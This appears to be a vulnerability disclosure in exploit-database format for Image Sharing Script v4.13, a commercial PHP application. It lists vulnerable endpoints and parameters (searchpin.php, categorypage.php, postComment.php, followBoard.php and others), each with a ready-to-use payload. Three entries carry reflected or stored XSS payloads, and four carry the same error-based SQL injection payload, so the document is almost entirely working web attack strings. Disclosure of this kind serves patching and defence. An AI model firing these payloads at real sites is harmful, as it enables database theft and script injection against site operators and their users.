Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerabilities
Author : Hasan Emre Ozer
Google Dork : -
Date : 16/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/image-sharing-script/
Software Price and Demo : $1250 http://photo-sharing.itechscripts.com/
--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/searchpin.php
Vulnerable Parameters : q=
Payload:"><img src=i onerror=prompt(1)>
-------------------------------
Type: Error Based SQL Injection
Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php
Vulnerable Parameters: pid
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
-------------------------------
Type: Error Based SQL Injection
Vulnerable URL:http://localhost/[PATH]/categorypage.php
Vulnerable Parameters: token
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/categorypage.php
Vulnerable Parameters : token
Payload:"><img src=i onerror=prompt(1)>
-------------------------------
Type: Stored XSS
Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php
Method: POST
Vulnerable Parameters : &text=
Payload:<img src=i onerror=prompt(1)>
--------------------------------
Type: Error Based SQL Injection
Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php
Vulnerable Parameters: id
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
---------------------------------
Type: Error Based SQL Injection
Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php
Vulnerable Parameters: brdId
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH